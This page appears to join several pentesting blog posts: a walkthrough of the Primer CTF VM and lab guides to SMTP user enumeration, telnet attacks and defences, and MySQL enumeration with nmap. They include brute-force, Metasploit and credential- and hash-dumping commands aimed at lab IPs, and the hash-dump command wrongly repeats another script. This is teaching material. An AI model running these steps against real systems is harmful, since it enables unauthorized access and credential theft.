Hack the Primer VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as Primer. The credit for making this vm machine goes to “couchsofa” and it is another boot2root challenge where we have to root the VM to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.115 but you will have to find our own)

netdiscover

Use nmap for port enumeration

nmap -sV  192.168.1.115

We found port 80 is open so we open this ip address in our browser.

We use dirb to list the directories and find robots.txt

dirb http://192.168.1.115/ -w

Inside the robots.txt we find a link to a page.

We open this link, it leads to page that has a story written on it.

We take a look at the source code at the and found another link.

When we open the link, we found a link on the page.

When we open this link, we are prompted for a password.

We capture the request of this page in burpsuite and and send it to repeater. In the response from the server, we find another link.

When we open the link, we find another page that prompts for password.

Now we take a look at the url, it looks like md5 so we removed the first and underscore we find something interesting.

We find that the url are actually prime numbers converted into md5 hashes. We were at the 7 page, and the hash to that is 17. So we convert 19(next prime number) to md5 hash.

To open the it we add “8_” in front of the hash to complete the url. We open it in our browser and find a page.

We take a look at the source code and find another url.

We open it and find a custom made terminal that uses javascript to execute certain commands.

In the ~/usr/falken/ folder we find a hint, when we take a look at the processes we find a command that we need to run.

When we run connect [email protected] It prompts for password. We get a hint from the log files that the password might be related to Joshua. In the logs we find that his date of birth i 6th august 1984. We use cupp to create a dictionary file.

We use burpsuite to bruteforce the password, we find that joshua1984 is the password.

When we login, we find a page again with terminal.

We check the files and find a few log files that are encoded. We use the decode command provided by the terminal to decode the files.

There we find our next clue, we googled trivial zero and found it was discovered by Riemann. We use cupp to create a dictionary with the given information.

We use burpsuite to bruteforce the password and find it to be Riemann.

When we login we are again prompted with another terminal.

When we look through the files we find the md5 encoded string for the usernames. We check for processes and again find a command.

When we crack the md5 password, we find that these are password for the respective username.

When we crack the md5 password, we find that these are password for the respective username.

When we login, we are again prompted with another terminal.

Looking through the files we find username, password and hostname.

We use these to login and find a page greeting us the end of the challenge.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

4 ways to SMTP Enumeration

We can also find out version and valid user of SMTP server using telnet. Execute following command and find out its version and valid user.

Telnet

telnet 192.168.1.107 25

From given image you can observe that it has successfully shown “220 mail.ignite.lab ESMTP Postfix” has been installed on target machine.

You can guess for valid user account through following command and if you receive response code 550 it means unknown user account:

vrfy [email protected]

If you received message code 250,251,252 which means server has accept the request and user account is valid.

But if you received message code 550 it means invalid user account as shown in given image

vrfy [email protected]

Metasploit

The SMTP service has two internal commands that allow the enumeration of users: VRFY (confirming the names of valid users) and EXPN (which reveals the actual address of user’s aliases and lists of e-mail (mailing lists)). Through the implementation of these SMTP commands can reveal a list of valid users.

use auxiliary/scanner/smtp/smtp_enum

msf auxiliary(smtp_enum) > set rhosts 192.168.1.107

msf auxiliary(smtp_enum) > set rport 25

msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt

msf auxiliary(smtp_enum) > exploit

From given image you can read the valid username found in targeted server as well as it also grab SMTP banner.

smtp-user-enum

 smtp-user-enum is a tool for enumerating OS-level user accounts on Solaris via the SMTP service (sendmail). Enumeration is performed by inspecting the responses to VRFY, EXPN and RCPT TO commands. It could be adapted to work against other vulnerable SMTP daemons, but this hasn’t been done as of v1.0.

 Type following command to enumerate username using dictionary of usernames:

 smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107

 -M: mode Method to use for username guessing EXPN, VRFY or RCPT 

 -U: file File of usernames to check via smtp service
 -t: host Server host running smtp service

From given image you can see out of total 7 queries only 5 names are valid and exist in smtp server.

Type following command to verify user email address on mail server:

smtp-user-enum -M VRFY -D mail.ignite.lab -u raj -t 192.168.1.107

-D:  dom   Domain to append to supplied user list to make email addresses; Use this option when you want to guess valid email addresses instead of just usernames.

From given image you can see it has shown [email protected] is valid email ID for user raj.

iSMTP

iSMTP is the kali Linux toolw which is use for testing SMTP user enumeration (RCPT TO and VRFY), internal spoofing, and relay.

Type following command to enumerate valid email ID of targeted server:

ismtp -h 192.168.1.107:25 -e /root/Desktop/email.txt

-h <host>       The target IP and port (IP:port)

 -e <file>   Enable SMTP user enumeration testing and imports email list.

From given image you can see blue color text refer to valid email account and red color text refer to invalid account.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

Penetration Testing on Telnet (Port 23)

Welcome to Internal penetration testing on telnet server where you will learn telnet installation and configuration, enumeration and attack, system security and precaution.  

From Wikipedia

Telnet is a protocol used on the Internet or local area networks to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection. This protocol is used to establish a connection to Transmission Control Protocol (TCP) port number 23, where a Telnet server application (telnetd) is listening.

Let’s start!!!

Requirements

Telnet Server: Ubuntu

Attacker system: Kali Linux

Telnet Installation & Configuration in 3 steps

Installing telnet server is very simple, it will get activated by following three steps:

  • Open the terminal in ubuntu and type given below command with root access.

apt-get install xinted telnet

  • Open ineted.conf file add given below statement inside it, then save it.

gedit /etc/inetd.conf

telnet stream tcp nowait telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd

  • Now open xibetd.conf and add following line for configuration setting and save it.

gedit /etc/xinetd.conf

# Simple configuration file for xinetd

#

# Some defaults, and include /etc/xinetd.d/

defaults

{

# Please note that you need a log_type line to be able to use log_on_success

# and log_on_failure. The default is the following :

# log_type = SYSLOG daemon info

instances = 60

log_type = SYSLOG authpriv

log_on_success = HOST PID

log_on_failure = HOST

cps = 25 30

}

includedir /etc/xinetd.d

Now execute following command to restart the service.

sudo /etc/init.d/xinetd restart

Now you can ensure whether telnet service is getting activated or not and for this we had scan our own system with nmap.

nmap –p 23 127.0.0.1

If service is activated in targeted server then nmap show open STATE for port 23.

SSH Banner grabbing through telnet

A telnet play an important role in banner grabbing of other service running on target system. Open the terminal in kali Linux and type following command for finding the version of SSH service running on targeted machine.

telnet 192.168.0.106 22

From given image you can observe that it has successfully shown the SSH version “2.0-openSSH_6.6.1p1”has been installed on target machine.

SMTP Banner grabbing through telnet

Similarly we can also find out version and valid user of SMTP server using telnet. Execute following command and find out its version and valid user.

telnet 192.168.0.25 25

From given image you can observe that it has successfully shown “220 mail.ignite.lab ESMTP Postfix” has been installed on target machine.

You can guess for valid user account through following command and if you receive response code 550 it means unknown user account:

vrfy [email protected]

If you received message code 250,251,252 which means server has accept the request and user account is valid.

But if you received message code 550 it means invalid user account as shown in given image

vrfy [email protected]

Telnet Banner Grabbing through Metasploit

An attacker always perform enumeration for finding important information such as software version which known as Banner Grabbing and then identify it state of vulnerability against any exploit.

Open the terminal in your kali Linux and Load metasploit framework; now type following command to scan for TELNET version.

use auxiliary/scanner/telnet/telnet_version

msf auxiliary(telnet_version) > set rhosts 192.168.0.106

msf auxiliary(telnet_version) > set rport 23

msf auxiliary(telnet_version) >set threads 5

msf auxiliary(telnet_version) > exploit

From given image you can read the highlighted text which is showing the installed version of TELNET on target’s system.

Brute Force Attack

An attacker always tries to make brute force attack for stealing credential for unauthorized access.

This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Now type following command to Brute force TELNET login:

use auxiliary/scanner/telnet/telnet_login

msf auxiliary(telnet_login) > set rhosts 192.168.0.106

msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt

msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(telnet_login) > set stop_on_success true

msf auxiliary(telnet_login) > exploit

From given image you can observe that our TELNET server is not secure against brute force attack because it is showing matching combination of username: raj and password: 123 for login simultaneously it has opened victims command shell as session 1.

From given image you can see now we have unauthorized access on victim’s system as [email protected] and executed ifconfig to verify the network interface.

We can also convert command shell into meterpreter shell using following command

sessions –u 1

From given image you can see that now we are having two sessions; 1st for command shell session and 2nd for meterpreter session.

Stealing credential through sniffing

Telnet, by default, does not encrypt any data sent over the connection (including passwords), and so it is often feasible to eavesdrop on the communications and use the password later for malicious purposes; anybody who has access the network between the two hosts where Telnet is being used can intercept the packets passing between source and destination and obtain login, password and data information.

From given image you can observe that here the client is login into telnet server by submitting valid credential on other hand attacker is sniffing network packet using wireshark  or other tools.

Here you can notice wireshark had captured telnet information by sniffing the network. It follow similar protocol as FTP where telnet users may authenticate themselves with a clear-text sign-in protocol for username and password. As result attacker can easily sniff login credential.

From given below image you can read the username: raj and password: 123 moreover complete information travelling through packet between source to destination.

Since Telnet implementations do not support Transport Layer Security (TLS) security and Simple Authentication and Security Layer (SASL) authentication extensions. Therefore in favour of that the Secure Shell (SSH) protocol, first released in 1995 in replaced of Telnet.

Secure Telnet through Port forwarding

In order to secure telnet server admin can forward port from default to specific port to run the service. Open services file using following command for making changes:

gedit /etc/services

From given image you can perceive that telnet default uses port 23 for its services; change the port number for telnet service.

From given below image you can compare that we had changed port 23 with 2323, now restart the service.

service xinetd restart

Verify it using nmap command as given below:

nmap –p 2323 –sV 192.168.0.106

Secure telnet against brute force attack

You can secure telnet server against brute force and from unauthorized access by adding filter using Iptable. Allow only specific IP address to establish connection with telnet server and reject or drop the connection from other IP addresses.

Now type following command with root permission to add filter for telnet in iptables.

Iptables –A INPUT –s 192.168.0.104 –p tcp –dport 23 –j ACCEPT

Above command will allow the traffic from IP address 192.168.0.104 to access the telnet service on port 23.

Iptables –A INPUT –p tcp –dport 23 –j DROP

Above command with drop the service for traffic coming from other IP addresses on port 23.

Restart the service once you add filter in iptables

sudo /etc/init.d/xinetd restart

Let verify the working of Ipatble by connecting to telnet server from client machine holding IP address 192.168.0.104.

Great!! Connection established successfully.

You can confirm it from given below image.

Let verify the working of Ipatble by connecting to telnet server from attacker machine holding different IP address.

From given below image you can see nothing is happing here because port 23 is down for all other IP addresses

Awesome!! It means if attacker sniff the valid credential then also will not able to access the telnet server.

 Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

MySQL Penetration Testing with NMAP

In this article we are discussing MYSQL penetration testing using Nmap where you will learn how to retrieve database information such as database name, table’s records, username, password and etc.

MySQL is an open Source for Relational Database Management System that uses structured query language for generating database record.  

Lets Begin !!!

 Scanning for port 3306

 open the terminal and type following command to check mysql service is activated on targeted system or not, basically mysql service is activated on default port 3306.

nmap -sT 192.168.1.216

From given image you can observe port 3306 is open for mysql service, now lets enumerate it.

Retrieve mysql information

Now type another command to retrieve mysql information such as version, protocol and etc:

nmap –script=mysql-info 192.168.1.216

Above command try to connect to with MySQL server and hence prints information such as the protocol: 10, version numbers: 5.5.57 -0ubuntu0.14.04.1, thread ID: 159, status: auto commit, capabilities, and the password salt as shown in given below image.

Brute force attack

This command will use dictionary for username and password and then try to match the username and password combination by making brute force attack against mysql.

 nmap -p 3306 –script mysql-brute –script-args userdb=/root/Desktop.lst,passdb=/root/Desktop/pass.lst 192.168.1.216

 From given image you can observe that it found the valid credential root: toor. This credential will help in directly login into MYSQL server.

Retrieve mysql user names

This command will fetch mysql users name which help of given argument mysqluser root and mysqlpass toor.

Nmap -p 3306 –script=mysql-users 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given below image you can see we had found four user names: root, debian-sys-maint, sr, st.

Retrieve database names

This command will fetch mysql database name which help of given argument mysqluser root and mysqlpass toor.

nmap -p 3306 –script=mysql-databases 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

 From given below image you can read the name of created database such as ignite

This command will also perform same task as above but retrieve database name using mysql query “show database”

nmap -p 3306 192.168.1.216 –script mysql-query –script-args “query=show databases,username=root,password=toor”

 From given below image you can read the name of created database such as ignite

Retrieve mysql variable status ON/OFF

When we want to pass a value from one SQL statement to another SQL statement, then we store the value in a MySQL user-defined variable.

This command will fetch mysql variables name which help of given argument mysqluser root and mysqlpass toor.

nmap -p 3306 –script=mysql-variables 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given image you can observe ON/OFF status for mysql variable.

Retrieve Hash password

This command will Dumps the password hashes from a MySQL server in a format suitable for cracking by tools such as John the Ripper.

nmap -p 3306 –script=mysql-variables 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given image you can observe that it has dumped the hash value of passwords of respective user which we have enumerated above.

Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

Related Posts Plugin for WordPress, Blogger...